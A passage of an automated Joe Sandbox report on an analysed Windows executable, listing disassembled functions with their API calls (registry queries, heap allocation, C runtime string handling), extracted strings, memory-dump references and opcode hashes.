                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                            • String ID:
                            • API String ID: 3040284667-0
                            • Opcode ID: a944448c8cdc4eef6f081957f57c62b1082a9fb1872cd468cb0c84170f1aa784
                            • Instruction ID: af1a01c408126b89b68bf2df1634a5f1d5888dfc7c72a2d1b8954a65bf0ac7d5
                            • Opcode Fuzzy Hash: a944448c8cdc4eef6f081957f57c62b1082a9fb1872cd468cb0c84170f1aa784
                            • Instruction Fuzzy Hash: 2C21E4B1518301EF8350DF65D88496BBBF9EFD9254F409A1EF599C3220E730D6048BA6
                            Function 006F3130 Relevance: 7.6, APIs: 5, Instructions: 61registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006F3166
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006F316D
                            • RegOpenKeyExA.ADVAPI32(80000002,0100B798,00000000,00020119,?), ref: 006F318C
                            • RegQueryValueExA.ADVAPI32(?,0101E538,00000000,00000000,00000000,000000FF), ref: 006F31A7
                            • RegCloseKey.ADVAPI32(?), ref: 006F31B1
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: 50d247dc5566197bcf8794ba5abee43c90da22c5ef75a768c3f80a349f68263c
                            • Instruction ID: 4838f3a5daf7679c6926ec923c7841d76735b1b56b3e1e2e214990197ab786e6
                            • Opcode Fuzzy Hash: 50d247dc5566197bcf8794ba5abee43c90da22c5ef75a768c3f80a349f68263c
                            • Instruction Fuzzy Hash: 7F116DB2A04219AFD710DB94DD49BBBBBBDE748B11F004229FA09E2680DB7459008BA1
                            Function 006F90DD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: String___crt$Type
                            • String ID:
                            • API String ID: 2109742289-3916222277
                            • Opcode ID: 7baf0860726bcf819c88fc15896ce5e13cac3aef2e1ab7332c6560a7ebebbb6c
                            • Instruction ID: f6759916baa4a9aa2ec33e8cbdff4b06705d1a5f04aba53fa92754f416f211f0
                            • Opcode Fuzzy Hash: 7baf0860726bcf819c88fc15896ce5e13cac3aef2e1ab7332c6560a7ebebbb6c
                            • Instruction Fuzzy Hash: 8D41C37150475CAEDB21CB288D85FFB7BFEAB45704F1444E8EA8A86182E2719B45CF34
                            Function 006D8980 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94COMMON
                            Download Yara Rule
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 006D8996
                              • Part of subcall function 006FA1C0: std::exception::exception.LIBCMT ref: 006FA1D5
                              • Part of subcall function 006FA1C0: std::exception::exception.LIBCMT ref: 006FA1FB
                            • std::_Xinvalid_argument.LIBCPMT ref: 006D89CD
                              • Part of subcall function 006FA173: std::exception::exception.LIBCMT ref: 006FA188
                              • Part of subcall function 006FA173: std::exception::exception.LIBCMT ref: 006FA1AE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: invalid string position$string too long
                            • API String ID: 2002836212-4289949731
                            • Opcode ID: 25c7ad36d0d5d26b8d030bd0c6e397b01665a70d5f6e2f24ff95b32102a48b61
                            • Instruction ID: 712ea731bac1d571949851db6bb062ea6fb001cccd86381ab80baadeecf4ac0b
                            • Opcode Fuzzy Hash: 25c7ad36d0d5d26b8d030bd0c6e397b01665a70d5f6e2f24ff95b32102a48b61
                            • Instruction Fuzzy Hash: 6321D6B27002508FC720DA5CE854A6AF7AADBA1761B15097FF181CB381CB71D841C3A9
                            Function 006D8850 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 89COMMON
                            Download Yara Rule
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 006D8883
                              • Part of subcall function 006FA173: std::exception::exception.LIBCMT ref: 006FA188
                              • Part of subcall function 006FA173: std::exception::exception.LIBCMT ref: 006FA1AE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: vector<T> too long$yxxx$yxxx
                            • API String ID: 2002836212-1517697755
                            • Opcode ID: c67fe2bd86fae624156f02408ef35b3eda71391ff856c8156de686ccc419bbf2
                            • Instruction ID: ea32a507f2dcd6f7ee67aaff621f09ce05dfabc50a82ab45605198b21987cd93
                            • Opcode Fuzzy Hash: c67fe2bd86fae624156f02408ef35b3eda71391ff856c8156de686ccc419bbf2
                            • Instruction Fuzzy Hash: 9A31A9B5E005199FCB08DF58C8916AEBBB6EB88350F14C269E915DF385DB34AD01CBD1
                            Function 006F5910 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57COMMON
                            Download Yara Rule
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 006F5922
                              • Part of subcall function 006FA173: std::exception::exception.LIBCMT ref: 006FA188
                              • Part of subcall function 006FA173: std::exception::exception.LIBCMT ref: 006FA1AE
                            • std::_Xinvalid_argument.LIBCPMT ref: 006F5935
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_std::exception::exception
                            • String ID: Sec-WebSocket-Version: 13$string too long
                            • API String ID: 1928653953-3304177573
                            • Opcode ID: 4d0a40f47042d72f80d7e6e3c280cae0c25ba63f50f5b62c8a26d898970b54f9
                            • Instruction ID: 2c7132ac5e00f09f3c1d415eb1bd25fb0ed2eba1509c5308e1f555c0946d7aaf
                            • Opcode Fuzzy Hash: 4d0a40f47042d72f80d7e6e3c280cae0c25ba63f50f5b62c8a26d898970b54f9
                            • Instruction Fuzzy Hash: A1117070304B84CBC7258B2CE800B2977E2AB91761F250B9EE3D287795C7A1DC41C7A5
                            Function 006F3CC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,006FA430,000000FF), ref: 006F3D20
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006F3D27
                            • wsprintfA.USER32 ref: 006F3D37
                              • Part of subcall function 006F71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 006F71FE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesslstrcpywsprintf
                            • String ID: %dx%d
                            • API String ID: 1695172769-2206825331
                            • Opcode ID: eb063118b49216cdf969c98eea1dc67672ca56f31a823902a2c45b227160f592
                            • Instruction ID: 9241027cf65ed6492ce59e5f8f7b1b9380f61b6d3210314934cb9241e698afea
                            • Opcode Fuzzy Hash: eb063118b49216cdf969c98eea1dc67672ca56f31a823902a2c45b227160f592
                            • Instruction Fuzzy Hash: F201CC72648714BFE7209BA4DC0AF6BBBB8FB46B61F000115FA059B2D0CBB41900CAA1
                            Function 006F926D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • __getptd.LIBCMT ref: 006F9279
                              • Part of subcall function 006F87FF: __amsg_exit.LIBCMT ref: 006F880F
                            • __amsg_exit.LIBCMT ref: 006F9299
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __amsg_exit$__getptd
                            • String ID: Xup$Xup
                            • API String ID: 441000147-1624883197
                            • Opcode ID: 8d060e8a8898b6f86119c543f634a8817a7644e0856bd3e2fa79da6dbdddba83
                            • Instruction ID: 6f6a965e69edb7bb593e26a45671b0ae393421662764fcbf541c226031af8e3f
                            • Opcode Fuzzy Hash: 8d060e8a8898b6f86119c543f634a8817a7644e0856bd3e2fa79da6dbdddba83
                            • Instruction Fuzzy Hash: 5801C032D16B29EADBA5AB2D98057FDB3A27F00B14F144119E61067780CB287E41DBE9
                            Function 006D8710 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                            Download Yara Rule
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 006D8737
                              • Part of subcall function 006FA173: std::exception::exception.LIBCMT ref: 006FA188
                              • Part of subcall function 006FA173: std::exception::exception.LIBCMT ref: 006FA1AE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: vector<T> too long$yxxx$yxxx
                            • API String ID: 2002836212-1517697755
                            • Opcode ID: 34b82b62339657b7cfec4fc3a6119ff8ce702271272cb483f818da68a9373252
                            • Instruction ID: 93b5f928315ee2ed76f8b396939275308587c177460709ce430bd377f42965ce
                            • Opcode Fuzzy Hash: 34b82b62339657b7cfec4fc3a6119ff8ce702271272cb483f818da68a9373252
                            • Instruction Fuzzy Hash: 92F0B477F000211F8354A43D8D8949FA94796E539033AD766E91AEF399DC70EC8295D4
                            Function 006F86D2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                              • Part of subcall function 006F781C: __mtinitlocknum.LIBCMT ref: 006F7832
                              • Part of subcall function 006F781C: __amsg_exit.LIBCMT ref: 006F783E
                            • ___addlocaleref.LIBCMT ref: 006F8756
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ___addlocaleref__amsg_exit__mtinitlocknum
                            • String ID: KERNEL32.DLL$Xup$xtp
                            • API String ID: 3105635775-395367854
                            • Opcode ID: e519986ff4080cce9235bdac8963a1ae6eb8b94a4bf7fba8a19dc2854857abcf
                            • Instruction ID: 3f762e1612995ebfa3ab87df8aa149716df32c01243d5c47b4df09693cb51118
                            • Opcode Fuzzy Hash: e519986ff4080cce9235bdac8963a1ae6eb8b94a4bf7fba8a19dc2854857abcf
                            • Instruction Fuzzy Hash: 6301D671845B08DEE760AF79C80575EFBE1AF50324F208A5DE2E6572E0CFB4A604CB18
                            Function 006F7363 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                            Download Yara Rule
                            APIs
                            • std::exception::_Copy_str.LIBCMT ref: 006F73F6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
